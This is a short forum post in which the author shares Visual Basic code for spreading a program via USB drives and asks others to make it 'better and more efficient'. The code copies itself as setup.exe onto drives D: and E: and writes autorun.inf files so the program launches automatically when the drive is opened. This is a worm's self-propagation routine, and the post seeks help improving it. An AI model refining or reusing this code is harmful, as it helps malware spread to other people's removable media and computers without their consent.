honestly i don't know much about usb spreading but i came up with this, can someone help me make it better and more efficient?
Code:File = setup.exe FileCopy wfile, "d:\" & File FileCopy wfile, "e:\" & File Open "d:\autorun.inf" For Output As 1 Print #1, "[autorun]" Print #1, "open=setup.exe" Close #1, Open "e:\autorun.inf" For Output As 2 Print #2, "[autorun]" Print #2, "open=setup.exe" Close #2


LinkBack URL
About LinkBacks
Reply With Quote
